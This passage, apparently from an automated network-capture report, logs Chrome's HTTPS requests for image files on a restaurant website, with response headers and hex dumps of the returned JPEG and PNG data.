                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0d 0b 0b 0d 0e 0d 10 0e 0e 10 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 03 8e 03 66 03 01 22 00 02 11 01 03 11 01 ff c4 00 e4 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 00 07 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 10 00 02 02 03 00 02 02 01 05 00 02 03 01 00 02 03 01 02 03 04 00 11 05 12 06 10 21 13 20 31 22 14 07 41 15 30 32 23 16 24 40 33 17 25 11 00 02 01 02 04 02 06 05 07 09 05 06 05 03 03 05 01 02 03 00 11 21 31 12 04 41 22 51 32 42 52 62 13 61 71 72 82 05 10 92 a2 c2 23 43 14 81 91 b2 d2 33
                                                                                                                                                    Data Ascii: f"! 1"A02#$@3%!1A"Q2BRbaqr#C3
                                                                                                                                                    2024-10-01 04:26:54 UTC15252INData Raw: 63 92 31 4e 15 53 8c a0 e3 f8 e3 b6 b1 0f f1 07 79 bf 9d e6 be 14 7d 9f db f6 52 e7 14 7d 15 62 c1 f4 03 03 9b cd e7 ef 83 0e b3 4b 9e 23 3c 71 88 39 f8 c0 c3 08 c1 1e b0 46 c3 3f 10 70 6b 1c 15 49 c8 e2 0a 35 80 e1 1b c2 30 60 18 3e b0 91 85 b6 ce 46 20 3b 46 03 17 ec 7c 6f 35 9a cd 60 19 38 f1 65 fb c3 b5 65 71 80 ef f4 2f de 68 60 1a c2 37 8e b9 f8 d7 08 23 36 73 67 14 90 55 c0 3e 78 0f d0 cd 66 b3 f6 cd 9d 3f d9 79 06 7f ce 8e 10 46 24 84 11 23 62 31 38 32 49 74 44 c7 61 81 c2 30 ae 28 cd e4 cf ac 52 59 48 cf 30 0b 30 d4 56 19 73 cc 67 90 3f a4 8c b2 e3 63 43 24 1b 10 7f 2c 0c aa 09 df ca 1f b6 fd 95 8e 2e 39 1f 1a 39 ac d0 c2 80 e7 e3 fb c1 f5 81 b0 7d e6 b1 b7 92 36 95 98 9c f1 de 00 06 30 18 88 87 04 51 62 aa e0 00 63 cc 8a 1e 72 5a 3d e2 13 83 35
                                                                                                                                                    Data Ascii: c1NSy}R}bK#<q9F?pkI50`>F ;F|o5`8eeq/h`7#6sgU>xf?yF$#b182ItDa0(RYH00Vsg?cC$,.99}60QbcrZ=5
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: f4 de cf 30 90 58 2e 94 37 d1 13 c8 31 a4 63 9f 91 b2 0b 12 c1 37 af 7b 0c 5d fa 53 44 41 b1 13 d6 66 86 bc eb 61 51 93 93 64 c3 27 47 a0 c9 82 f4 b7 ba 31 4a e1 62 50 ef 24 09 26 40 51 43 ab 96 36 0b c0 c6 34 9a 38 a5 91 6b 31 8d 2d 58 91 8b 5b bc d6 4f 99 c0 a4 10 7f 93 4e e1 92 77 d8 44 23 7b 2a 3f 87 2b 92 b3 95 1e 79 3c c1 44 ae 49 f7 b8 09 e9 5f 85 e7 ad 51 1d 2b 7e 65 59 24 9d 59 e5 9b 53 51 d3 db 21 35 33 a4 71 04 b7 31 59 45 44 3d 19 e4 13 30 26 59 18 bd 38 a7 75 33 3c b5 af cd 46 cc 93 bb 45 3d 7b 1e 6a d1 af 94 c8 1e 1a b1 f8 27 a9 cc 5f 98 30 0c 40 09 27 1d 7f 24 50 32 85 a5 5a a2 b7 82 85 9a ac 52 a7 43 9c 23 63 10 19 e0 30 2e 71 38 1d 0e ed de 1f 0a 87 02 93 ca 90 0b 3d fa 70 bd 8e fa 91 35 ae 85 dc e8 41 1c 50 b4 eb 1c 37 ec f8 18 ae 87 3c
                                                                                                                                                    Data Ascii: 0X.71c7{]SDAfaQd'G1JbP$&@QC648k1-X[ONwD#{*?+y<DI_Q+~eY$YSQ!53q1YED=0&Y8u3<FE={j'_0@'$P2ZRC#c0.q8=p5AP7<
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: d2 8a b4 6f 02 b0 b5 62 0a 70 a7 f5 5f a1 52 38 67 3f 95 bf 2f 17 8f cf bb 46 f7 29 2b 19 0a 19 39 94 5f a1 7e b7 63 9b 5a a4 1d 3e 79 02 d4 32 89 ec 46 5b a0 3f 34 b3 d6 af be 74 4f 2d 21 cd 8d 3a 17 8c 11 64 f7 25 b1 3c 8a 91 94 99 65 9b f3 b8 54 eb 2a d7 b1 3a 9c 8e ec 62 1a b3 f5 25 b3 da a9 15 fe c7 47 96 90 72 69 7b 3a 4a dc 33 c1 96 7f 78 f6 09 2c 5a 76 fb 86 22 e0 49 1a 2f e5 7d a9 0c 48 20 8d b1 40 cc d6 60 44 6a b6 99 ce 84 d1 d7 b2 04 96 ae 88 db 88 f1 d4 82 ad b8 a7 b2 dd 22 94 e3 ab 5a 0e 37 2f fb d6 32 46 06 1a 96 2c 73 66 a9 6e bd 98 c8 fa 3f bc 8a 0a b0 d6 2b 6c fb 47 02 2e df 36 58 66 ad 35 69 3c d3 81 27 e0 ea f4 22 fc 17 b9 92 8a 91 7b 24 df 9f aa 23 0d 92 c6 11 48 04 b2 00 34 72 3a a5 e3 7a d2 ae 00 54 d1 f6 4e dd 23 43 fd 1a 45 ce 77
                                                                                                                                                    Data Ascii: obp_R8g?/F)+9_~cZ>y2F[?4tO-!:d%<eT*:b%Gri{:J3x,Zv"I/}H @`Dj"Z7/2F,sfn?+lG.6Xf5i<'"{$#H4r:zTN#CEw
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 14 de 8f 72 16 12 d8 db b9 24 53 b9 59 2f 0f 04 f1 15 e8 4b cf 45 9a 61 45 ac b2 b0 93 52 24 a7 24 bd 4d 70 9a 27 72 13 8c fe e4 ec b6 77 21 d0 93 d8 f7 71 d3 0b c2 04 9e c5 2c 94 59 25 94 43 cb 22 5d f3 d1 a6 49 58 55 16 5e 10 8d 4d 7a 56 4f 13 e4 8d 48 d8 bc 28 b2 19 18 dd 14 a4 96 f0 a4 6a 76 cc bc 66 a2 48 67 d7 25 74 2b a5 08 a2 96 0a 77 1c 6c 6b 85 93 fc b2 4b c1 43 d4 87 f7 29 ca 1c 6d 96 16 6a c2 30 fc e4 b2 b3 57 4a 11 42 73 a9 0b 04 bb 0f c9 3b 63 a5 61 47 63 da 4f 2f b0 bc 61 e4 6d ee 56 59 65 74 3e 99 63 d0 c8 92 7a 10 55 92 27 dc 8e 56 8f 77 1d 30 84 5c 10 91 a1 2e fc 13 fc 4a 24 b2 3a 35 d4 86 57 5e 0a c8 bc 61 ed e5 a6 13 c7 91 f2 64 2d 48 45 b3 da f4 25 69 86 84 f4 28 d2 08 34 c6 8f ac 74 eb 3d f4 af 0d 4d 70 97 fb 12 f1 69 e8 ba 37 8c e6
                                                                                                                                                    Data Ascii: r$SY/KEaER$$Mp'rw!q,Y%C"]IXU^MzVOH(jvfHg%t+wlkKC)mj0WJBs;caGcO/amVYet>czU'Vw0\.J$:5W^ad-HE%i(4t=Mpi7
                                                                                                                                                    2024-10-01 04:26:54 UTC16336INData Raw: 3b b4 dc e5 71 e7 5e 20 ff 00 ee 50 65 51 86 22 f8 d0 dc 30 e4 03 02 0d eb 90 12 a3 ab d1 42 22 8a c0 e0 49 18 da 8b 60 ea 73 4e d0 fd 74 a0 00 01 71 02 f4 59 f0 0a 48 17 e9 a0 d3 0d 57 e1 5a 36 e7 cb 61 c6 d8 50 32 b0 36 1c c6 d9 d0 78 cf 30 38 69 34 6c 41 63 85 88 b6 3e d5 58 92 c8 71 52 4e 5f a9 56 dc 0d 2d d9 61 f5 a8 a9 60 ca 4f 29 06 82 c9 83 0c ad c6 84 80 f2 db 99 4f 1a 1b 65 6b c2 df b4 90 f5 47 77 4f bd 58 9a d2 08 d5 6a 1b 2d c9 e4 7c 21 73 c0 f7 5a bd 15 e9 ad 2c 2a d6 3e ba 0c 71 d3 d2 2a d8 fe 6a 37 22 8e 96 2a 0e 60 64 6a c4 0b de e1 ab 1b 9a 2d 33 8b 81 70 a0 d3 43 b1 17 39 5c 1f d2 6a 2d b9 90 b0 bd f4 03 85 0b 71 f4 50 dc 7c 4c e8 53 8a 6d c1 b3 1e ef 9b dc 4a 11 7c 37 6a ed 1a 8d 2b a1 48 50 3d ae a5 09 3e 25 b8 5d ba 9f bb 4e 77 fd 44
                                                                                                                                                    Data Ascii: ;q^ PeQ"0B"I`sNtqYHWZ6aP26x08i4lAc>XqRN_V-a`O)OekGwOXj-|!sZ,*>q*j7"*`dj-3pC9\j-qP|LSmJ|7j+HP=>%]NwD
                                                                                                                                                    2024-10-01 04:26:54 UTC48INData Raw: b8 5f ab d6 ec 53 c4 39 89 51 7b f0 a1 1a 86 55 b6 91 6e 2d 44 6e 01 7d ac a8 da e2 06 e4 76 55 be 7d 22 a8 36 53 62 78 01 51 44 d0 f9 b1 b2 9c
                                                                                                                                                    Data Ascii: _S9Q{Un-Dn}vU}"6SbxQD
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 09 b7 5b b5 ed d1 4d 9a 08 43 93 ae 66 17 6c 7b 31 2f 62 8b 33 85 6e b5 c9 b9 3e 2a 73 19 28 a0 82 18 d8 93 42 48 e6 52 f1 8c 01 1f a3 48 b1 12 16 34 0a a1 85 c8 ed 37 d6 a8 b4 ca 35 39 22 c3 02 3d aa 31 ca ac cc 82 c2 50 30 b7 8b b9 44 86 52 d7 cc 1d 26 f4 04 8c 1a 20 2c 4b 70 a0 d0 1b 32 f3 aa de ea c3 b4 b4 21 8e c1 9c 16 6b 7e 95 3b 91 70 b6 70 7e 8d 2c 41 43 1b ad d8 1b d8 8d 2d 51 4a 05 b4 81 fe 6a 9a 38 cd 81 b3 36 1e f5 46 e8 18 49 29 e4 36 c0 b7 75 5b bf 4e b3 14 1b a4 40 1d a3 c8 b5 b9 59 bc 74 93 c3 34 66 56 61 e6 20 26 e4 31 e6 f6 29 e3 60 1a 06 00 14 39 1a 22 25 64 75 17 59 01 20 81 48 e2 41 a2 4b 15 d4 71 b7 79 ab 4a 9d 4e f8 bb 9e 26 89 39 0c e8 93 47 e1 bb 46 fb 67 1a 58 83 d4 4f d7 a0 5c fa 6d c4 d0 00 59 47 0a 8b 6d 10 bc 93 ba a2 8f 68
                                                                                                                                                    Data Ascii: [MCfl{1/b3n>*s(BHRH4759"=1P0DR& ,Kp2!k~;pp~,AC-QJj86FI)6u[N@Yt4fVa &1)`9"%duY HAKqyJN&9GFgXO\mYGmh


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    118192.168.2.449885162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:54 UTC659OUTGET /assets/imgs/food_menu_tea.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:50 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 25627
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 2d 08 06 00 00 00 0a 96 f3 bb 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 56 e1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR7-pHYsViTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:54 UTC9243INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    119192.168.2.449886162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:54 UTC658OUTGET /assets/imgs/img_recipe_5.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:10:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 188613
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: ff d8 ff e1 1b 4f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: OExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:54 UTC6016INData Raw: 37 3a 31 30 3a 34 37 2b 30 35 3a 33 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 66 65 36 31 63 37 35 66 2d 34 33 32 61 2d 64 63 34 66 2d 38 35 31 63 2d 35 66 66 38 39 65 61 32 64 37 61 30 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 33 2d 31 30 2d 30 35 54 31 37 3a 31 30 3a 34 37 2b 30 35 3a 33 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f
                                                                                                                                                    Data Ascii: 7:10:47+05:30" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:fe61c75f-432a-dc4f-851c-5ff89ea2d7a0" stEvt:when="2023-10-05T17:10:47+05:30" stEvt:softwareAgent="Adobe Photo
                                                                                                                                                    2024-10-01 04:26:54 UTC2176INData Raw: 01 01 02 11 03 11 00 00 00 ce f0 bd 9f 05 c3 cc b0 a4 7e 45 64 b8 19 a2 85 99 6a 98 64 04 4b 22 76 0a 8e 88 f0 5c 4c 0a f4 bc 14 60 e9 40 4b 03 2d 6c ec 52 e4 2c cf 32 cd 59 cc b5 21 e0 f3 2c 12 1e 0a 80 d1 01 e6 78 2a 8a a7 e1 f8 75 1d 11 55 71 2e 89 89 3a 00 93 00 ea 99 9c b1 78 1e a2 ed 59 92 1e 02 01 1a bb 56 0f 05 53 f0 ec 28 1c 22 07 54 ea 9c 22 91 63 97 3d 19 58 2c 17 11 c2 50 09 a1 cb b0 12 91 aa 65 af 35 66 78 77 4c a9 d8 3c c9 14 04 84 20 c1 61 0c 2a d4 32 a0 09 a5 a1 8c 72 d4 b3 cc a0 4b 5e 0a 05 42 07 01 50 f0 55 15 1d 43 c1 51 d1 31 a2 13 94 e5 38 0b 2a 89 d1 75 4b 14 b0 d4 76 9b a8 63 eb 2d 37 cc cd e2 66 8b 48 81 61 5d a3 b4 56 ae 16 0f 04 27 e0 f0 eb 2e 02 07 08 a2 74 4e 92 d8 df 38 09 41 40 e9 48 c1 20 53 b8 8d 41 da b3 5e 65 02 aa ae 04
                                                                                                                                                    Data Ascii: ~EdjdK"v\L`@K-lR,2Y!,x*uUq.:xYVS("T"c=X,Pe5fxwL< a*2rK^BPUCQ18*uKvc-7fHa]V'.tN8A@H SA^e
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 9b 08 d4 95 a0 e4 0e be 61 5e 96 39 d6 45 d0 d6 7d 07 9e 86 67 a1 c8 dd c2 99 56 c2 b6 0a 31 4c b1 86 30 d5 93 1c 55 13 56 b0 47 ab e4 10 5e 40 e5 ca 6c a1 c9 96 c4 d3 4c 39 62 a4 f5 32 2a a7 09 8e 40 cd 51 3b 32 c1 76 8d 48 ae 49 53 66 4d 2b 35 02 12 a1 45 d2 4a 27 f0 bf 43 3b 08 e2 84 54 57 19 45 2c 0b 06 d0 91 51 b4 9b e9 5d 39 06 45 b6 8d 16 80 a9 15 6a 8d 44 c4 9e 88 6b 89 94 19 1e 4f c3 20 85 2e 13 2a 0a 15 1f ce b7 d7 01 f7 df 3e c6 b3 ea 3c f4 33 3d 4d ce ce 96 c4 db 0a ce 53 0d b2 86 ae 5b b8 2b 9f 69 ce b6 fe 4f 37 bf cf 0b 2e 22 71 ef 13 4c 89 f1 3c f3 68 44 68 8d 5e 8b 35 e0 a4 ba 4b aa 63 92 42 ec 90 86 78 50 c1 b2 07 23 f2 50 03 54 28 a9 41 05 f2 7e bf 68 cf 8f 5e fc ef 19 8e 59 e6 9d 11 1b 10 d7 04 46 ba 7a 24 6b d4 30 d4 2a 84 d9 4d 84 10
                                                                                                                                                    Data Ascii: a^9E}gV1L0UVG^@lL9b2*@Q;2vHISfM+5EJ'C;TWE,Q]9EjDkO .*><3=MS[+iO7."qL<hDh^5KcBxP#PT(A~h^YFz$k0*M
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 14 74 f5 49 59 56 c5 2c c5 a1 60 6e 4a 67 a1 84 de 90 b6 54 f7 6f 3e 7e b1 cd 37 83 57 1a 4b 39 b7 32 7a 53 31 34 19 d1 ac f4 d6 69 d1 fd d3 ed 7e 46 a1 41 2e e2 a0 ba 71 17 69 ba cd 42 70 15 45 51 40 aa 2a 9a 6d 2a 29 10 e6 12 81 0c c4 b2 6c f0 65 df 74 4b 1d 30 e6 cf 03 8a fe 7f a1 f3 f8 c7 67 59 04 ce b5 df 41 d1 a6 7e 6d cd 4c 6c e6 1d 31 ad 67 a3 26 0c 99 ac f4 e8 14 a6 a3 78 2c 00 00 34 24 eb 39 32 e1 3a 75 d4 cb bb a3 e2 f4 75 a5 da 08 8a 6e 28 41 4a 4b 36 cc d5 a6 9b 48 aa b6 a6 53 34 e8 b5 c1 78 b4 b1 d7 d2 db b5 b3 7c fe d6 33 7a 27 86 7a e1 d9 89 d3 96 97 3e 9b 38 d3 50 31 23 11 62 8d 9b 2b a6 32 fb 8f da fc 95 47 02 80 a8 0d 01 54 18 a1 cb 84 e8 9c 04 22 a9 d1 0b 31 32 7c 16 68 69 09 20 c8 a4 1d 8f 3e 5b 7d 10 08 78 1c 96 62 af 4f 1b ae 05 d1
                                                                                                                                                    Data Ascii: tIYV,`nJgTo>~7WK92zS14i~FA.qiBpEQ@*m*)letK0gYA~mLl1g&x,4$92:uun(AJK6HS4x|3z'z>8P1#b+2GT"12|hi >[}xbO
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: cc cc cf 82 61 99 99 fc 87 8c 4c 43 2c b4 92 95 e2 3d 9e ad 7e 51 94 ac 16 40 d3 10 19 cb 21 07 bc f8 cc cc 26 7c 82 1b 84 37 18 5b 3e 14 0f 18 81 7c 1f 51 9f 27 88 13 30 c0 60 33 60 ff 00 8c 46 c1 30 cc 78 3e 0c c4 c4 c4 c4 c4 33 d4 fd c7 58 2d 18 6c 71 5a 54 cc f8 44 2c 4f a8 ec 49 63 1c fb 1e c8 1e ec 22 19 ca 72 99 99 99 99 99 fe 3c cb 2e 55 86 d2 f1 50 28 08 5a 1a 41 9c 00 96 d2 1c 36 94 fe b1 13 81 13 31 5a 55 33 39 18 cf 80 6d 8c f9 95 0c 9c 4e 02 14 9c 20 5f c0 b6 23 12 d0 10 21 fc 33 2c 19 53 ea 09 98 61 fc b1 e0 46 68 27 a8 98 11 9b 31 c1 30 3b 08 96 12 0b 2e 22 5c 00 cc 68 c6 3f ef 19 85 a6 01 8e 26 3c 63 f8 f3 01 99 8d 60 02 dd a8 95 96 23 0b 12 b8 4f 93 0c 30 8c cb 02 a9 57 c1 1b 22 7f 60 4f 98 46 b0 19 98 62 36 20 22 13 ca 01 80 f7 71 3f d8
                                                                                                                                                    Data Ascii: aLC,=~Q@!&|7[>|Q'0`3`F0x>3X-lqZTD,OIc"r<.UP(ZA61ZU39mN _#!3,SaFh'10;."\h?&<c`#O0W"`OFb6 "q?
                                                                                                                                                    2024-10-01 04:26:55 UTC16331INData Raw: 26 3c 63 f8 b3 3f 70 d4 a6 1d 78 d5 11 38 98 47 e3 9f c3 30 19 99 98 0f 90 07 8c 8f e1 c4 c4 c7 f1 e6 66 66 67 ce 7f f1 31 31 f8 e7 f1 c7 e6 27 c6 0c 3a c0 c6 d5 31 a9 22 11 31 f9 e6 66 66 72 81 a7 29 ca 72 98 fe 4c 4c 7f f8 8c 4c 79 1e 08 86 1f 20 45 4f 19 99 99 85 14 c6 d6 06 36 b9 10 d6 66 26 3f 1c cc cc cc cc fe 18 fe 43 ff 00 e0 b1 fc 84 42 b3 8c 09 00 02 66 13 33 33 f8 fa 8d 4a 18 75 63 6b b4 35 91 31 31 f9 0f c8 ff 00 09 87 f0 3f c2 20 fc 07 e2 21 83 f9 4f 83 f8 08 61 82 2c 3e 0f e2 3c 18 20 82 5b 1b c1 fc bf ff da 00 08 01 01 00 01 05 00 0c c0 e5 b2 19 f0 59 a1 2d 80 6c c3 33 88 2c 7c ab bc 4b 18 cf 91 a0 b1 e1 b0 e0 16 cb 33 cc bb 44 0f 3f ce 37 2c 1f 92 73 b4 15 77 ca 16 84 19 86 8e 0c 60 d9 c3 43 cb 16 72 c3 b3 89 96 25 79 80 0b 4c b0 81 d8 40
                                                                                                                                                    Data Ascii: &<c?px8G0ffg11':1"1ffr)rLLLy EO6f&?CBf33Juck511? !Oa,>< [Y-l3,|K3D?7,sw`Cr%yL@
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: fc 9f 46 ff 00 5c 6e 76 f7 74 bd 0e a7 5d ac a0 28 67 f4 f6 7b 27 24 09 ea 33 62 3b fa 6b 0c 67 9f 24 f9 0c ed 29 1b 3a 1d fe b1 f9 c2 95 3d 9d af 4b 2e ce 4d 57 97 96 ba ab 3e c0 12 db 89 2e e4 cf 90 88 2e 02 23 af 32 4e 54 8c 02 4c f8 49 52 81 49 30 62 68 e2 cd ce ca e7 77 fa cb 55 45 ad d8 eb 5d 67 63 fd a2 9d 8f 5e ef 5f 62 2b ba af af d6 bd 6e a5 db cf fd 5e ab b2 d8 b9 be 4d e6 b3 b0 5b e9 d5 ea b7 b6 af dc d7 ee 6a d3 41 b3 ac 4d 96 59 f1 f6 5b a9 5a f6 fb a5 a3 db 75 d5 ee 8d ca f6 be 9c 4f 79 af af ab 55 6e 07 c3 3e d9 d8 0a a6 cf 79 ab 47 57 ab f6 ab 6d dc fb 96 8e ff 00 67 d8 bf 48 35 8d 1a cb 74 fb 0d ee 37 6a b2 c7 7a 58 9b 75 35 ff 00 ff 00 5d 7e 44 44 ef f4 d9 d1 09 14 e5 46 8e 9d 01 7a fd 4a e8 8d ad b1 70 ff 00 6f fd 7f 97 6f ff 00 c6 34
                                                                                                                                                    Data Ascii: F\nvt](g{'$3b;kg$):=K.MW>..#2NTLIRI0bhwUE]gc^_b+n^M[jAMY[ZuOyUn>yGWmgH5t7jzXu5]~DDFzJpoo4
